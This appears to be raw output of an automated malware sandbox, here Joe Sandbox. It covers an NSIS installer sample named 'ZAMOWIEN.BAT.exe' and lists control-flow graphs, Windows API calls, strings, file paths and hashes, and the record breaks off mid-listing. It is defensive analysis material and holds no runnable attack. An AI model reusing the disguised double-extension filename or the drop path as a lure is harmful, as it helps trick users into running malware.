                                                                                  • String ID: "C:\Users\user\Desktop\ZAMOWIEN.BAT.exe"$.tmp$1033$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\vaporarium\immunoassay\overniceness$C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\vaporarium\immunoassay\overniceness$C:\Users\user\Desktop$C:\Users\user\Desktop\ZAMOWIEN.BAT.exe$Error launching installer$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$UXTHEME$\Temp$~nsu
                                                                                  • API String ID: 3441113951-4162361014
                                                                                  • Opcode ID: 3b799489f38086b66f8157c52dfdd850dbfcc699f0e2a59af50d3155f203b837
                                                                                  • Instruction ID: 33263885e95349ea6af21411810ae013db8a0064eb9284cbb984bc5e65c45519
                                                                                  • Opcode Fuzzy Hash: 3b799489f38086b66f8157c52dfdd850dbfcc699f0e2a59af50d3155f203b837
                                                                                  • Instruction Fuzzy Hash: ABD12771200301ABD7207F659D45B3B3AACEB4074AF50487FF881B62E1DB7E8A55876E

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 139 40542b-405446 140 4055d5-4055dc 139->140 141 40544c-405513 GetDlgItem * 3 call 404230 call 404b89 GetClientRect GetSystemMetrics SendMessageW * 2 139->141 143 405606-405613 140->143 144 4055de-405600 GetDlgItem CreateThread CloseHandle 140->144 159 405531-405534 141->159 160 405515-40552f SendMessageW * 2 141->160 145 405631-40563b 143->145 146 405615-40561b 143->146 144->143 150 405691-405695 145->150 151 40563d-405643 145->151 148 405656-40565f call 404262 146->148 149 40561d-40562c ShowWindow * 2 call 404230 146->149 163 405664-405668 148->163 149->145 150->148 153 405697-40569d 150->153 155 405645-405651 call 4041d4 151->155 156 40566b-40567b ShowWindow 151->156 153->148 161 40569f-4056b2 SendMessageW 153->161 155->148 164 40568b-40568c call 4041d4 156->164 165 40567d-405686 call 4052ec 156->165 166 405544-40555b call 4041fb 159->166 167 405536-405542 SendMessageW 159->167 160->159 168 4057b4-4057b6 161->168 169 4056b8-4056e3 CreatePopupMenu call 4062a6 AppendMenuW 161->169 164->150 165->164 178 405591-4055b2 GetDlgItem SendMessageW 166->178 179 40555d-405571 ShowWindow 166->179 167->166 168->163 176 4056e5-4056f5 GetWindowRect 169->176 177 4056f8-40570d TrackPopupMenu 169->177 176->177 177->168 180 405713-40572a 177->180 178->168 183 4055b8-4055d0 SendMessageW * 2 178->183 181 405580 179->181 182 405573-40557e ShowWindow 179->182 184 40572f-40574a SendMessageW 180->184 185 405586-40558c call 404230 181->185 182->185 183->168 184->184 186 40574c-40576f OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 184->186 185->178 188 405771-405798 SendMessageW 186->188 188->188 189 40579a-4057ae GlobalUnlock SetClipboardData CloseClipboard 188->189 189->168
                                                                                  APIs
                                                                                  • GetDlgItem.USER32(?,00000403), ref: 00405489
                                                                                  • GetDlgItem.USER32(?,000003EE), ref: 00405498
                                                                                  • GetClientRect.USER32(?,?), ref: 004054D5
                                                                                  • GetSystemMetrics.USER32(00000002), ref: 004054DC
                                                                                  • SendMessageW.USER32(?,00001061,00000000,?), ref: 004054FD
                                                                                  • SendMessageW.USER32(?,00001036,00004000,00004000), ref: 0040550E
                                                                                  • SendMessageW.USER32(?,00001001,00000000,00000110), ref: 00405521
                                                                                  • SendMessageW.USER32(?,00001026,00000000,00000110), ref: 0040552F
                                                                                  • SendMessageW.USER32(?,00001024,00000000,?), ref: 00405542
                                                                                  • ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 00405564
                                                                                  • ShowWindow.USER32(?,00000008), ref: 00405578
                                                                                  • GetDlgItem.USER32(?,000003EC), ref: 00405599
                                                                                  • SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 004055A9
                                                                                  • SendMessageW.USER32(00000000,00000409,00000000,?), ref: 004055C2
                                                                                  • SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 004055CE
                                                                                  • GetDlgItem.USER32(?,000003F8), ref: 004054A7
                                                                                    • Part of subcall function 00404230: SendMessageW.USER32(00000028,?,?,0040405B), ref: 0040423E
                                                                                  • GetDlgItem.USER32(?,000003EC), ref: 004055EB
                                                                                  • CreateThread.KERNEL32(00000000,00000000,Function_000053BF,00000000), ref: 004055F9
                                                                                  • CloseHandle.KERNELBASE(00000000), ref: 00405600
                                                                                  • ShowWindow.USER32(00000000), ref: 00405624
                                                                                  • ShowWindow.USER32(?,00000008), ref: 00405629
                                                                                  • ShowWindow.USER32(00000008), ref: 00405673
                                                                                  • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004056A7
                                                                                  • CreatePopupMenu.USER32 ref: 004056B8
                                                                                  • AppendMenuW.USER32(00000000,00000000,00000001,00000000), ref: 004056CC
                                                                                  • GetWindowRect.USER32(?,?), ref: 004056EC
                                                                                  • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 00405705
                                                                                  • SendMessageW.USER32(?,00001073,00000000,?), ref: 0040573D
                                                                                  • OpenClipboard.USER32(00000000), ref: 0040574D
                                                                                  • EmptyClipboard.USER32 ref: 00405753
                                                                                  • GlobalAlloc.KERNEL32(00000042,00000000), ref: 0040575F
                                                                                  • GlobalLock.KERNEL32(00000000), ref: 00405769
                                                                                  • SendMessageW.USER32(?,00001073,00000000,?), ref: 0040577D
                                                                                  • GlobalUnlock.KERNEL32(00000000), ref: 0040579D
                                                                                  • SetClipboardData.USER32(0000000D,00000000), ref: 004057A8
                                                                                  • CloseClipboard.USER32 ref: 004057AE
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.33320346660.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.33320291711.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.33320404991.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.33320475606.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.33320475606.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.33320475606.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.33320475606.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.33320475606.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.33320475606.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.33320898956.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_ZAMOWIEN.jbxd
                                                                                  Similarity
                                                                                  • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
                                                                                  • String ID: {$6B
                                                                                  • API String ID: 590372296-3705917127
                                                                                  • Opcode ID: eda15b0fa8e85a5ee056dfe18a98c225c15b93093155cbe620ec270875def271
                                                                                  • Instruction ID: 3049cebfab52017954bd75dac417762e958ea911a39284ee9670f095a09d9852
                                                                                  • Opcode Fuzzy Hash: eda15b0fa8e85a5ee056dfe18a98c225c15b93093155cbe620ec270875def271
                                                                                  • Instruction Fuzzy Hash: BAB13970900609FFEF119FA1DD89AAE7B79EB04354F40403AFA45AA1A0CB754E52DF68

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 499 405996-4059bc call 405c61 502 4059d5-4059dc 499->502 503 4059be-4059d0 DeleteFileW 499->503 505 4059de-4059e0 502->505 506 4059ef-4059ff call 406284 502->506 504 405b52-405b56 503->504 507 405b00-405b05 505->507 508 4059e6-4059e9 505->508 512 405a01-405a0c lstrcatW 506->512 513 405a0e-405a0f call 405ba5 506->513 507->504 511 405b07-405b0a 507->511 508->506 508->507 514 405b14-405b1c call 4065c7 511->514 515 405b0c-405b12 511->515 516 405a14-405a18 512->516 513->516 514->504 523 405b1e-405b32 call 405b59 call 40594e 514->523 515->504 519 405a24-405a2a lstrcatW 516->519 520 405a1a-405a22 516->520 522 405a2f-405a4b lstrlenW FindFirstFileW 519->522 520->519 520->522 524 405a51-405a59 522->524 525 405af5-405af9 522->525 539 405b34-405b37 523->539 540 405b4a-405b4d call 4052ec 523->540 529 405a79-405a8d call 406284 524->529 530 405a5b-405a63 524->530 525->507 528 405afb 525->528 528->507 541 405aa4-405aaf call 40594e 529->541 542 405a8f-405a97 529->542 533 405a65-405a6d 530->533 534 405ad8-405ae8 FindNextFileW 530->534 533->529 535 405a6f-405a77 533->535 534->524 538 405aee-405aef FindClose 534->538 535->529 535->534 538->525 539->515 543 405b39-405b48 call 4052ec call 40604a 539->543 540->504 552 405ad0-405ad3 call 4052ec 541->552 553 405ab1-405ab4 541->553 542->534 544 405a99-405aa2 call 405996 542->544 543->504 544->534 552->534 556 405ab6-405ac6 call 4052ec call 40604a 553->556 557 405ac8-405ace 553->557 556->534 557->534
                                                                                  APIs
                                                                                  • DeleteFileW.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\,764A3420,00000000), ref: 004059BF
                                                                                  • lstrcatW.KERNEL32(004256F0,\*.*,004256F0,?,?,C:\Users\user\AppData\Local\Temp\,764A3420,00000000), ref: 00405A07
                                                                                  • lstrcatW.KERNEL32(?,0040A014,?,004256F0,?,?,C:\Users\user\AppData\Local\Temp\,764A3420,00000000), ref: 00405A2A
                                                                                  • lstrlenW.KERNEL32(?,?,0040A014,?,004256F0,?,?,C:\Users\user\AppData\Local\Temp\,764A3420,00000000), ref: 00405A30
                                                                                  • FindFirstFileW.KERNEL32(004256F0,?,?,?,0040A014,?,004256F0,?,?,C:\Users\user\AppData\Local\Temp\,764A3420,00000000), ref: 00405A40
                                                                                  • FindNextFileW.KERNEL32(00000000,00000010,000000F2,?,?,?,?,0000002E), ref: 00405AE0
                                                                                  • FindClose.KERNEL32(00000000), ref: 00405AEF
                                                                                  Strings
                                                                                  • "C:\Users\user\Desktop\ZAMOWIEN.BAT.exe", xrefs: 00405996
                                                                                  • C:\Users\user\AppData\Local\Temp\, xrefs: 004059A4
                                                                                  • \*.*, xrefs: 00405A01
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.33320346660.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.33320291711.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.33320404991.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.33320475606.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.33320475606.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.33320475606.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.33320475606.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.33320475606.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.33320475606.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.33320898956.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_ZAMOWIEN.jbxd
                                                                                  Similarity
                                                                                  • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                                                                  • String ID: "C:\Users\user\Desktop\ZAMOWIEN.BAT.exe"$C:\Users\user\AppData\Local\Temp\$\*.*
                                                                                  • API String ID: 2035342205-1724476554
                                                                                  • Opcode ID: d7a422a1aef06f55577592658d1c21977668bb8039ea8e57eb2cb6bab4ff21c4
                                                                                  • Instruction ID: c51eb27d53b6fe35fd8e31d26e19e594c53701a60ebafcf50548af423f91ca56
                                                                                  • Opcode Fuzzy Hash: d7a422a1aef06f55577592658d1c21977668bb8039ea8e57eb2cb6bab4ff21c4
                                                                                  • Instruction Fuzzy Hash: 0641B530A00914AACB21BB658C89BAF7778EF45729F60427FF801711D1D7BC5981DEAE
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.33320346660.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.33320291711.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.33320404991.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.33320475606.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.33320475606.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.33320475606.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.33320475606.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.33320475606.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.33320475606.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.33320898956.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_ZAMOWIEN.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 0ca90ec9e464192c9522d3965182f3407f0f46d2e5c2ee50019c84c966272eaf
                                                                                  • Instruction ID: 13591abb153405db8c483c3749d8f5c5d6ef56c483b3dbf0ce0e93ae11c78ade
                                                                                  • Opcode Fuzzy Hash: 0ca90ec9e464192c9522d3965182f3407f0f46d2e5c2ee50019c84c966272eaf
                                                                                  • Instruction Fuzzy Hash: 58F17871D04269CBDF18CFA8C8946ADBBB0FF44305F25856ED456BB281D3386A8ACF45
                                                                                  APIs
                                                                                  • FindFirstFileW.KERNELBASE(?,00426738,00425EF0,00405CAA,00425EF0,00425EF0,00000000,00425EF0,00425EF0,?,?,764A3420,004059B6,?,C:\Users\user\AppData\Local\Temp\,764A3420), ref: 004065D2
                                                                                  • FindClose.KERNEL32(00000000), ref: 004065DE
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.33320346660.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.33320291711.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.33320404991.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.33320475606.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.33320475606.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.33320475606.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.33320475606.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.33320475606.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.33320475606.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.33320898956.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_ZAMOWIEN.jbxd
                                                                                  Similarity
                                                                                  • API ID: Find$CloseFileFirst
                                                                                  • String ID: 8gB
                                                                                  • API String ID: 2295610775-1733800166
                                                                                  • Opcode ID: 10d21b2891892a60ec94b320bc5d87934ec883ac9a5b90ef038b3d3a92de116a
                                                                                  • Instruction ID: 17231fcebe31093dbb05a9ce9100934524038fc54cbd693a8662f86860803725
                                                                                  • Opcode Fuzzy Hash: 10d21b2891892a60ec94b320bc5d87934ec883ac9a5b90ef038b3d3a92de116a
                                                                                  • Instruction Fuzzy Hash: 46D012315450206BC60517387D0C84BBA589F653357128A37F466F51E4C734CC628698
                                                                                  APIs
                                                                                  • ShowWindow.USER32(00000000,00000000), ref: 00401E67
                                                                                  • EnableWindow.USER32(00000000,00000000), ref: 00401E72
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.33320346660.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.33320291711.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.33320404991.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.33320475606.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.33320475606.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.33320475606.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.33320475606.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.33320475606.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.33320475606.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.33320898956.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_ZAMOWIEN.jbxd
                                                                                  Similarity
                                                                                  • API ID: Window$EnableShow
                                                                                  • String ID:
                                                                                  • API String ID: 1136574915-0
                                                                                  • Opcode ID: f0df3e05e3b5ed1159a39937c9662c58851a2e21ea47a233f3ab8e4485993ad4
                                                                                  • Instruction ID: 63871ab535fe988d3adb25008cf832d4d85dc6cfcdc2aab035335d2457ba8122
                                                                                  • Opcode Fuzzy Hash: f0df3e05e3b5ed1159a39937c9662c58851a2e21ea47a233f3ab8e4485993ad4
                                                                                  • Instruction Fuzzy Hash: 2BE0D832E08200CFE724DFA5AA4946D77B4EB80314720447FF201F11D1CE7848418F6D

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 190 403d22-403d34 191 403e75-403e84 190->191 192 403d3a-403d40 190->192 194 403ed3-403ee8 191->194 195 403e86-403ece GetDlgItem * 2 call 4041fb SetClassLongW call 40140b 191->195 192->191 193 403d46-403d4f 192->193 196 403d51-403d5e SetWindowPos 193->196 197 403d64-403d67 193->197 199 403f28-403f2d call 404247 194->199 200 403eea-403eed 194->200 195->194 196->197 201 403d81-403d87 197->201 202 403d69-403d7b ShowWindow 197->202 207 403f32-403f4d 199->207 204 403f20-403f22 200->204 205 403eef-403efa call 401389 200->205 208 403da3-403da6 201->208 209 403d89-403d9e DestroyWindow 201->209 202->201 204->199 212 4041c8 204->212 205->204 227 403efc-403f1b SendMessageW 205->227 213 403f56-403f5c 207->213 214 403f4f-403f51 call 40140b 207->214 218 403da8-403db4 SetWindowLongW 208->218 219 403db9-403dbf 208->219 215 4041a5-4041ab 209->215 217 4041ca-4041d1 212->217 223 403f62-403f6d 213->223 224 404186-40419f DestroyWindow EndDialog 213->224 214->213 215->212 222 4041ad-4041b3 215->222 218->217 225 403e62-403e70 call 404262 219->225 226 403dc5-403dd6 GetDlgItem 219->226 222->212 228 4041b5-4041be ShowWindow 222->228 223->224 229 403f73-403fc0 call 4062a6 call 4041fb * 3 GetDlgItem 223->229 224->215 225->217 230 403df5-403df8 226->230 231 403dd8-403def SendMessageW IsWindowEnabled 226->231 227->217 228->212 260 403fc2-403fc7 229->260 261 403fca-404006 ShowWindow KiUserCallbackDispatcher call 40421d EnableWindow 229->261 235 403dfa-403dfb 230->235 236 403dfd-403e00 230->236 231->212 231->230 238 403e2b-403e30 call 4041d4 235->238 239 403e02-403e08 236->239 240 403e0e-403e13 236->240 238->225 242 403e49-403e5c SendMessageW 239->242 245 403e0a-403e0c 239->245 241 403e15-403e1b 240->241 240->242 246 403e32-403e3b call 40140b 241->246 247 403e1d-403e23 call 40140b 241->247 242->225 245->238 246->225 257 403e3d-403e47 246->257 256 403e29 247->256 256->238 257->256 260->261 264 404008-404009 261->264 265 40400b 261->265 266 40400d-40403b GetSystemMenu EnableMenuItem SendMessageW 264->266 265->266 267 404050 266->267 268 40403d-40404e SendMessageW 266->268 269 404056-404095 call 404230 call 403d03 call 406284 lstrlenW call 4062a6 SetWindowTextW call 401389 267->269 268->269 269->207 280 40409b-40409d 269->280 280->207 281 4040a3-4040a7 280->281 282 4040c6-4040da DestroyWindow 281->282 283 4040a9-4040af 281->283 282->215 285 4040e0-40410d CreateDialogParamW 282->285 283->212 284 4040b5-4040bb 283->284 284->207 286 4040c1 284->286 285->215 287 404113-40416a call 4041fb GetDlgItem GetWindowRect ScreenToClient SetWindowPos call 401389 285->287 286->212 287->212 292 40416c-40417f ShowWindow call 404247 287->292 294 404184 292->294 294->215
                                                                                  APIs
                                                                                  • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403D5E
                                                                                  • ShowWindow.USER32(?), ref: 00403D7B
                                                                                  • DestroyWindow.USER32 ref: 00403D8F
                                                                                  • SetWindowLongW.USER32(?,00000000,00000000), ref: 00403DAB
                                                                                  • GetDlgItem.USER32(?,?), ref: 00403DCC
                                                                                  • SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 00403DE0
                                                                                  • IsWindowEnabled.USER32(00000000), ref: 00403DE7
                                                                                  • GetDlgItem.USER32(?,?), ref: 00403E95
                                                                                  • GetDlgItem.USER32(?,00000002), ref: 00403E9F
                                                                                  • SetClassLongW.USER32(?,000000F2,?), ref: 00403EB9
                                                                                  • SendMessageW.USER32(0000040F,00000000,?,?), ref: 00403F0A
                                                                                  • GetDlgItem.USER32(?,00000003), ref: 00403FB0
                                                                                  • ShowWindow.USER32(00000000,?), ref: 00403FD1
                                                                                  • KiUserCallbackDispatcher.NTDLL(?,?), ref: 00403FE3
                                                                                  • EnableWindow.USER32(?,?), ref: 00403FFE
                                                                                  • GetSystemMenu.USER32(?,00000000,0000F060,?), ref: 00404014
                                                                                  • EnableMenuItem.USER32(00000000), ref: 0040401B
                                                                                  • SendMessageW.USER32(?,000000F4,00000000,?), ref: 00404033
                                                                                  • SendMessageW.USER32(?,00000401,00000002,00000000), ref: 00404046
                                                                                  • lstrlenW.KERNEL32(004236E8,?,004236E8,00000000), ref: 00404070
                                                                                  • SetWindowTextW.USER32(?,004236E8), ref: 00404084
                                                                                  • ShowWindow.USER32(?,0000000A), ref: 004041B8
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.33320346660.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.33320291711.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.33320404991.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.33320475606.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.33320475606.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.33320475606.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.33320475606.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.33320475606.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.33320475606.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.33320898956.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_ZAMOWIEN.jbxd
                                                                                  Similarity
                                                                                  • API ID: Window$Item$MessageSend$Show$EnableLongMenu$CallbackClassDestroyDispatcherEnabledSystemTextUserlstrlen
                                                                                  • String ID: 6B
                                                                                  • API String ID: 3282139019-4127139157
                                                                                  • Opcode ID: 5b048d91d045b384b87ea39b7222d66b7397b759a9202294a9cfb78e4cfd3030
                                                                                  • Instruction ID: 82b316f52afb12e79a093577f28ca1d9a17c40f64bf266079eac87a4e965ab64
                                                                                  • Opcode Fuzzy Hash: 5b048d91d045b384b87ea39b7222d66b7397b759a9202294a9cfb78e4cfd3030
                                                                                  • Instruction Fuzzy Hash: 89C1C071600201ABDB316F61ED88E2B3A78FB95746F40063EF641B51F0CB395992DB2D

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 295 403974-40398c call 40665e 298 4039a0-4039d7 call 406152 295->298 299 40398e-40399e call 4061cb 295->299 304 4039d9-4039ea call 406152 298->304 305 4039ef-4039f5 lstrcatW 298->305 308 4039fa-403a23 call 403c4a call 405c61 299->308 304->305 305->308 313 403ab5-403abd call 405c61 308->313 314 403a29-403a2e 308->314 320 403acb-403af0 LoadImageW 313->320 321 403abf-403ac6 call 4062a6 313->321 314->313 315 403a34-403a5c call 406152 314->315 315->313 322 403a5e-403a62 315->322 324 403b71-403b79 call 40140b 320->324 325 403af2-403b22 RegisterClassW 320->325 321->320 326 403a74-403a80 lstrlenW 322->326 327 403a64-403a71 call 405b86 322->327 339 403b83-403b8e call 403c4a 324->339 340 403b7b-403b7e 324->340 328 403c40 325->328 329 403b28-403b6c SystemParametersInfoW CreateWindowExW 325->329 333 403a82-403a90 lstrcmpiW 326->333 334 403aa8-403ab0 call 405b59 call 406284 326->334 327->326 332 403c42-403c49 328->332 329->324 333->334 338 403a92-403a9c GetFileAttributesW 333->338 334->313 343 403aa2-403aa3 call 405ba5 338->343 344 403a9e-403aa0 338->344 348 403b94-403bae ShowWindow call 4065ee 339->348 349 403c17-403c18 call 4053bf 339->349 340->332 343->334 344->334 344->343 356 403bb0-403bb5 call 4065ee 348->356 357 403bba-403bcc GetClassInfoW 348->357 352 403c1d-403c1f 349->352 354 403c21-403c27 352->354 355 403c39-403c3b call 40140b 352->355 354->340 358 403c2d-403c34 call 40140b 354->358 355->328 356->357 361 403be4-403c07 DialogBoxParamW call 40140b 357->361 362 403bce-403bde GetClassInfoW RegisterClassW 357->362 358->340 366 403c0c-403c15 call 4038c4 361->366 362->361 366->332
                                                                                  APIs
                                                                                    • Part of subcall function 0040665E: GetModuleHandleA.KERNEL32(?,00000020,?,004033CB,0000000A), ref: 00406670
                                                                                    • Part of subcall function 0040665E: GetProcAddress.KERNEL32(00000000,?), ref: 0040668B
                                                                                  • lstrcatW.KERNEL32(1033,004236E8,80000001,Control Panel\Desktop\ResourceLocale,00000000,004236E8,00000000,00000002,C:\Users\user\AppData\Local\Temp\,764A3420,"C:\Users\user\Desktop\ZAMOWIEN.BAT.exe",00000000), ref: 004039F5
                                                                                  • lstrlenW.KERNEL32(Call,?,?,?,Call,00000000,C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\vaporarium\immunoassay\overniceness,1033,004236E8,80000001,Control Panel\Desktop\ResourceLocale,00000000,004236E8,00000000,00000002,C:\Users\user\AppData\Local\Temp\), ref: 00403A75
                                                                                  • lstrcmpiW.KERNEL32(?,.exe,Call,?,?,?,Call,00000000,C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\vaporarium\immunoassay\overniceness,1033,004236E8,80000001,Control Panel\Desktop\ResourceLocale,00000000,004236E8,00000000), ref: 00403A88
                                                                                  • GetFileAttributesW.KERNEL32(Call), ref: 00403A93
                                                                                  • LoadImageW.USER32(00000067,?,00000000,00000000,00008040,C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\vaporarium\immunoassay\overniceness), ref: 00403ADC
                                                                                    • Part of subcall function 004061CB: wsprintfW.USER32 ref: 004061D8
                                                                                  • RegisterClassW.USER32(004291A0), ref: 00403B19
                                                                                  • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00403B31
                                                                                  • CreateWindowExW.USER32(00000080,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00403B66
                                                                                  • ShowWindow.USER32(00000005,00000000), ref: 00403B9C
                                                                                  • GetClassInfoW.USER32(00000000,RichEdit20W,004291A0), ref: 00403BC8
                                                                                  • GetClassInfoW.USER32(00000000,RichEdit,004291A0), ref: 00403BD5
                                                                                  • RegisterClassW.USER32(004291A0), ref: 00403BDE
                                                                                  • DialogBoxParamW.USER32(?,00000000,00403D22,00000000), ref: 00403BFD
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.33320346660.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.33320291711.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
